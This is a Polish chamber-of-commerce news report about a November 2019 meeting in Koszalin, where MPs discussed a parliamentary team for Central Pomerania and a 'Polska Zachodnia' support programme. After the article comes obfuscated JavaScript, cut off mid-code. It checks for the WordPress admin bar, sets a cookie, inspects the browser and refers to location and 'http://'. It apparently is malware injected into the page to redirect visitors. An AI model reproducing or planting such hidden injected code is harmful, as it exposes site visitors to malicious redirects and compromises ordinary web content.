Spotkanie w sprawie powołania zespołu parlamentarnego ds. Pomorza Środkowego oraz utworzenia programu wsparcia pt. Polska Zachodnia -relacja | Północna Izba Gospodarcza w Koszalinie

W dniu 25 listopada 2019 roku w Restauracji Park Caffe w Koszalinie miało miejsce spotkanie w sprawie powołania zespołu parlamentarnego ds. Pomorza Środkowego oraz utworzenia programu wsparcia pt. Polska Zachodnia.

W spotkaniu udział wzięli posłowie z terenu Pomorza Środkowego m.in.: Pani Małgorzata Prokop-Paczkowska, Pan Piotr Zientarski, Pan Marek Hok oraz Pan Radosław Lubczyk. Od obecnych posłów otrzymaliśmy jasną deklarację utworzenia zadaniowego zespołu parlamentarnego do którego dołączą kolejni parlamentarzyści z regionu i spoza Pomorza Środkowego.

Dzisiaj jako izby gospodarcze zainicjowaliśmy powołanie zespołu ds. Pomorza Środkowego którego celem będzie wspieranie Regionu w szerszy sposób m.in.: stworzenia specjalnego programu grantowego umownie nazwanego Polska Zachodnia, wzorowanego na programie Polska Wschodnia, a także dokończenie dróg krajowych S6 i S11, powrót instytucji wojewódzkich ze Szczecina do Koszalina, Kołobrzegu, Szczecinka, Wałcza czy Drawska Pomorskiego oraz z Gdańska do Słupska czy Bytowa. W żaden sposób nie zamykamy kwestii stworzenia Województwa Środkowopomorskiego, ale pracujemy równolegle aby Pomorze Środkowe rozwijało się i dzięki wsparciu parlamentarzystów wszystkich opcji politycznych chcemy budować silny Region, silny gospodarczo.

Podczas dzisiejszego spotkania mogliśmy zapoznać się z prezentacjami naukowymi nt. wykluczenia komunikacyjnego oraz sytuacji gospodarczej regionu którą przedstawił dr Patrycjusz Zarębskiego z Politechniki Koszalińskiej oraz programu Polska Zachodnia przygotowanego przez Piotra Jaśkiewicza prezesa Fundacji Nauka dla Środowiska.

Materiały do pobrania:
Strategia_Rozwoju_2020

Potencjał, bariery i kierunki rozwoju Pomorza Środkowego – dr P. Zarebski

Prezentacja Projektu Dialog

Wnioskiem z dyskusji jest stanowisko posłów o powołaniu w Sejmie w najbliższym czasie zespołu parlamentarnego ds. Pomorza Środkowego oraz zapytania w sprawie analizy skutków ostatniej reformy administracyjnej. Przedstawiciele Izb zobowiązali się do przedstawienia wniosków do realizacji programu Polska Zachodnia i zapisaniu odpowiedniej puli środków przed uchwaleniem ustawy budżetowej.

O kolejnych działaniach poinformujemy niebawem.

W razie pytań prosimy o kontakt z biurem Północnej Izby Gospodarczej w Koszalinie tel. 94 341 10 83 mail koszalin@izba.info

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m